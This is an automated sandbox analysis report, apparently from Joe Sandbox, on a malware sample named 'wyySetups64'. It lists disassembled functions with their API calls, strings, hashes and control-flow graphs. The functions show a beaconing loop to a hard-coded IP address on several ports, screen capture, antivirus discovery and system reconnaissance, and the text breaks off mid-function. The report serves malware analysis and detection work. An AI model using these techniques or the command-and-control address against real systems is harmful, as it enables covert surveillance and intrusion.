                                                                                                                                                                                                              Function 00B20032 Relevance: 72.5, APIs: 3, Strings: 38, Instructions: 795memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 00B204AE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00B204DE
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B204F5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual$InfoNativeSystem
                                                                                                                                                                                                              • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                                                              • API String ID: 4117132724-2899676511
                                                                                                                                                                                                              • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                              • Instruction ID: 9bdc5d9e41bb36b370b750ee9d3dfb2ad15da331671d1804a0448ba574740621
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E062AB315183958FD731DF24D880BABBBE0FF95704F04486DE9C99B252E770A988CB96
                                                                                                                                                                                                              Function 0337DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 251 337df10-337df72 call 3380542 Sleep 254 337df97-337df9d 251->254 255 337df74-337df91 call 337f707 call 337fa29 CloseHandle 251->255 257 337dfa4-337e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 337fa29 CloseHandle call 337f707 254->257 258 337df9f call 3377620 254->258 255->254 267 337e01b-337e026 call 3372c90 257->267 268 337e028 257->268 258->257 269 337e02c-337e046 call 337f707 267->269 268->269 274 337e054 269->274 275 337e048-337e049 call 3379730 269->275 277 337e058 274->277 278 337e04e-337e052 275->278 279 337e063-337e06f call 337ce00 277->279 278->277 282 337e071-337e0b7 call 337f876 * 2 279->282 283 337e0b9-337e0fa call 337f876 * 2 279->283 292 337e100-337e110 282->292 283->292 293 337e152-337e15a 292->293 294 337e112-337e14c call 337ce00 call 337f876 * 2 292->294 295 337e162-337e169 293->295 296 337e15c-337e15e 293->296 294->293 298 337e177-337e17b 295->298 299 337e16b-337e175 295->299 296->295 301 337e181-337e187 298->301 299->301 303 337e1c6-337e1ee call 3380542 call 3372da0 301->303 304 337e189-337e1a3 EnumWindows 301->304 312 337e200-337e2ac call 3380542 CreateEventA call 337f876 call 337ca70 303->312 313 337e1f0-337e1fb Sleep 303->313 304->303 306 337e1a5-337e1c4 Sleep EnumWindows 304->306 306->303 306->306 321 337e2b7-337e2bd 312->321 313->279 322 337e2bf-337e2f3 Sleep RegOpenKeyExW 321->322 323 337e318-337e32c call 3375430 321->323 324 337e2f5-337e30b RegQueryValueExW 322->324 325 337e311-337e316 322->325 327 337e331-337e337 323->327 324->325 325->321 325->323 328 337e36a-337e370 327->328 329 337e339-337e365 CloseHandle 327->329 330 337e372-337e38e call 337fa29 328->330 331 337e390 328->331 329->279 334 337e394 330->334 331->334 336 337e396-337e39d 334->336 337 337e39f-337e3ae Sleep 336->337 338 337e40d-337e420 336->338 337->336 339 337e3b0-337e3b7 337->339 342 337e432-337e46c call 3380542 Sleep CloseHandle 338->342 343 337e422-337e42c WaitForSingleObject CloseHandle 338->343 339->338 341 337e3b9-337e3cb 339->341 347 337e3dd-337e408 Sleep CloseHandle 341->347 348 337e3cd-337e3d7 WaitForSingleObject CloseHandle 341->348 342->279 343->342 347->279 348->347
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03380542: __fassign.LIBCMT ref: 03380538
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 0337DF64
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337DF91
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 0337DFA9
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337DFE0
                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(033775B0), ref: 0337DFEE
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0337E007
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • EnumWindows.USER32(03375CC0,?), ref: 0337E19D
                                                                                                                                                                                                              • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0337E1AA
                                                                                                                                                                                                              • EnumWindows.USER32(03375CC0,?), ref: 0337E1BE
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0337E1F5
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0337E241
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0), ref: 0337E2C4
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0337E2EB
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0337E30B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337E35D
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0337E3A4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0337E3D0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 0337E3D7
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?), ref: 0337E3E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337E400
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0337E425
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?), ref: 0337E42C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 0337E446
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337E464
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                                                                                                                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19092$19092$19093$Console$IpDatespecial
                                                                                                                                                                                                              • API String ID: 1511462596-2550096010
                                                                                                                                                                                                              • Opcode ID: e3c3234d4b589f887833f8ca678ab1bdb555023b391488188815d878ea7eec63
                                                                                                                                                                                                              • Instruction ID: b0b789524e62bbed19f127d429087049f405872e7ede4bf999d19866a430f577
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3c3234d4b589f887833f8ca678ab1bdb555023b391488188815d878ea7eec63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDD1C0B4948704EFE360EF64DCC5A2BB7A8BBC4B00F040A1EF1958A295D77AD544CB62
                                                                                                                                                                                                              Function 0337BC70 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 351windowCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0337BC8F
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0337BC9C
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0337BCA2
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0337BCAD
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0337BCBA
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000076), ref: 0337BCC2
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0337BCD3
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 0337BCF8
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0337BD26
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004C), ref: 0337BD78
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0337BD8D
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0337BDA6
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 0337BDB4
                                                                                                                                                                                                              • SetStretchBltMode.GDI32(?,00000003), ref: 0337BDC0
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0337BDCD
                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004E), ref: 0337BDE0
                                                                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0337BE07
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BE7A
                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0337BE97
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337BEAF
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BF23
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BF2D
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0337BF39
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BFDF
                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0337BFE9
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0337BFF5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                                                                                                                                              • String ID: ($6$gfff$gfff
                                                                                                                                                                                                              • API String ID: 3293817703-713438465
                                                                                                                                                                                                              • Opcode ID: b18a18fcb7ecf1803e8658668538c2c1fe893a85197fb6244cac506bec8dc36c
                                                                                                                                                                                                              • Instruction ID: ada68b52ece4a4853867ba43d4e7090dbbdd3ca2acdd35473bca44de63e3efeb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b18a18fcb7ecf1803e8658668538c2c1fe893a85197fb6244cac506bec8dc36c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63D17BB5D01308EFDB24EFE9E885A9EBBB9FF48300F14452AF505AB240D775A905CB91
                                                                                                                                                                                                              Function 03376A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03376A94
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376AA7
                                                                                                                                                                                                                • Part of subcall function 03376910: GetCurrentProcessId.KERNEL32(7AA29978,00000000,00000000,75BF73E0,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376938
                                                                                                                                                                                                                • Part of subcall function 03376910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376947
                                                                                                                                                                                                                • Part of subcall function 03376910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 03376960
                                                                                                                                                                                                                • Part of subcall function 03376910: CloseHandle.KERNEL32(00000000,?,00000000,033910DB,000000FF,?,03376AB3,00000000), ref: 0337696B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376AC2
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?), ref: 03376ADB
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 03376B12
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 03376B19
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03376B3F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 03376B49
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 03376B5D
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03376B85
                                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32 ref: 03376B98
                                                                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 03376BA6
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 03376BB5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03376BC2
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376C1B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                                                                                                                                              • String ID: -N/$NO/$None/%s
                                                                                                                                                                                                              • API String ID: 3036438616-3095023699
                                                                                                                                                                                                              • Opcode ID: eec921083c97e604e60da78d963d84881b64a2b78d6e87ad203822683959f92b
                                                                                                                                                                                                              • Instruction ID: f4308c7a58bac1cf100582827480b3126d8525014fbf8e3ebea90efbaa762fab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eec921083c97e604e60da78d963d84881b64a2b78d6e87ad203822683959f92b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C419270900618EFEB34EB61CCDAFEF777CEB0A700F044496E60596241DA39D994CBA1
                                                                                                                                                                                                              Function 03376150 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 222stringcomregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 755 3376150-33761a5 call 3386770 call 338004b 760 33761a7-33761ae 755->760 761 3376201-3376228 CoCreateInstance 755->761 764 33761b0-33761b2 call 3376050 760->764 762 3376422-337642f lstrlenW 761->762 763 337622e-3376282 761->763 766 3376441-3376450 762->766 767 3376431-337643b lstrcatW 762->767 773 337640a-3376418 763->773 774 3376288-33762a2 763->774 771 33761b7-33761b9 764->771 768 3376452-3376457 766->768 769 337645a-337647a call 337f00a 766->769 767->766 768->769 775 33761db-33761ff call 338004b 771->775 776 33761bb-33761d9 lstrcatW * 2 771->776 773->762 779 337641a-337641f 773->779 774->773 782 33762a8-33762b4 774->782 775->761 775->764 776->775 779->762 783 33762c0-3376363 call 3386770 wsprintfW RegOpenKeyExW 782->783 786 33763e9-33763ff 783->786 787 3376369-33763ba call 3386770 RegQueryValueExW 783->787 790 3376402-3376404 786->790 791 33763dc-33763e3 RegCloseKey 787->791 792 33763bc-33763da lstrcatW * 2 787->792 790->773 790->783 791->786 792->791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337618B
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,0339510C,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 033761CD
                                                                                                                                                                                                              • lstrcatW.KERNEL32(033A1F10,0339535C,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 033761D9
                                                                                                                                                                                                              • CoCreateInstance.OLE32(03392480,00000000,00000017,0339578C,?,?,7AA29978,00000AD4,00000000,75BF73E0), ref: 03376220
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033762CE
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03376336
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0337635F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376376
                                                                                                                                                                                                                • Part of subcall function 03376050: _memset.LIBCMT ref: 0337607C
                                                                                                                                                                                                                • Part of subcall function 03376050: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03376088
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                                                                                                                                              • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                                                                                                                                              • API String ID: 1221949200-1583895642
                                                                                                                                                                                                              • Opcode ID: cbdc17da158ecb54ec1ba241c04b5b2e5626efc011978ce306f672c73043b30c
                                                                                                                                                                                                              • Instruction ID: c3943828c418e65ae984b13a9fc4d17daed80f6baf1e6a7fa77496eeff8c26c1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbdc17da158ecb54ec1ba241c04b5b2e5626efc011978ce306f672c73043b30c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 238193B1A00628AFDB20DB54CCD1FAEB7BCEB48704F0445C9F719A7142D6749A80CFA4
                                                                                                                                                                                                              Function 033780F0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 114stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03378132
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,A:\), ref: 03378166
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,B:\), ref: 03378176
                                                                                                                                                                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033781A6
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 033781B7
                                                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 033781CE
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 03378204
                                                                                                                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 03378228
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,00000000), ref: 03378233
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                                                                                                                                              • String ID: A:\$B:\
                                                                                                                                                                                                              • API String ID: 950920757-1009255891
                                                                                                                                                                                                              • Opcode ID: 56e870a62bc75e3c3bffcc7566d389ea83f6997fb5aa722157fc4169faf94687
                                                                                                                                                                                                              • Instruction ID: 7994aa9697f73134791786a673509c8a10e69644f749f92f6748e141388fc56b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56e870a62bc75e3c3bffcc7566d389ea83f6997fb5aa722157fc4169faf94687
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7841A671A0121CEBDB20EF64DDC5AAEB37CEF44700F04449AE909E7240E775DA05CBA4
                                                                                                                                                                                                              Function 03376790 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03375320: InterlockedDecrement.KERNEL32(00000008), ref: 0337536F
                                                                                                                                                                                                                • Part of subcall function 03375320: SysFreeString.OLEAUT32(00000000), ref: 03375384
                                                                                                                                                                                                                • Part of subcall function 03375320: SysAllocString.OLEAUT32(03395148), ref: 033753D5
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03395148,033769A4,03395148,00000000,75BF73E0), ref: 033767F4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 033767FE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 03376816
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0337681D
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0337683F
                                                                                                                                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03376871
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0337687B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 033768E6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 033768ED
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                                                                                                                                              • String ID: NONE_MAPPED
                                                                                                                                                                                                              • API String ID: 1317816589-2950899194
                                                                                                                                                                                                              • Opcode ID: fe95139c768f786c5a2d1a427d72fac9480dad684a23cc657aa4bfa391819df3
                                                                                                                                                                                                              • Instruction ID: b9043cbf7f2a79d9d39badd23b55ac966fdd12089c1eab3a0c4a8133f7ec3a6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe95139c768f786c5a2d1a427d72fac9480dad684a23cc657aa4bfa391819df3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D4194B5900618FFEB20DB64DCC5FAF737CEB85701F004499E609EA140DA799A858B60
                                                                                                                                                                                                              Function 03376C50 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 99COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 03376C8B
                                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 03376CAA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03376CE1
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 03376CF4
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 03376D39
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 03376D4C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                                                                                                                                              • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                                                                                                                                              • API String ID: 3202570353-3501811827
                                                                                                                                                                                                              • Opcode ID: c48b5201d3f1596db91b92c1f57558e1ea8971c9432f9cd54706e3c5d4fa06ae
                                                                                                                                                                                                              • Instruction ID: 0b0e25c7aea189dc99b0f0cb39a907232d1c984abd65a427cfb86ab36df92e46
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48b5201d3f1596db91b92c1f57558e1ea8971c9432f9cd54706e3c5d4fa06ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB316FB6E0020CABDB14DFE5CC85FEEB7B9FB48700F50421EE91AAB241E6745945CB90
                                                                                                                                                                                                              Function 03376EE0 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 410COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDXGIFactory.DXGI(0339579C,?,7AA29978,74DEDF80,00000000,75BF73E0), ref: 03376F4A
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 0337711E
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 033771C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                                                                                                                                                                                                              • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                                                                                                                                                                                                              • API String ID: 3803070356-257307503
                                                                                                                                                                                                              • Opcode ID: 8b5155474e2d83885070a010ebeaa2809e18b3cf8d45c2b808eeea1ed4c6b10d
                                                                                                                                                                                                              • Instruction ID: 1bfcd48134716939767426eb19d6697989451bbe970b10ec9de09aade7e6ed92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b5155474e2d83885070a010ebeaa2809e18b3cf8d45c2b808eeea1ed4c6b10d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1E15271E012259FDF34CE64CCD1BEEB3B5AB89700F1446E9D91AA7284D774AE818F90
                                                                                                                                                                                                              Function 00BD54C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
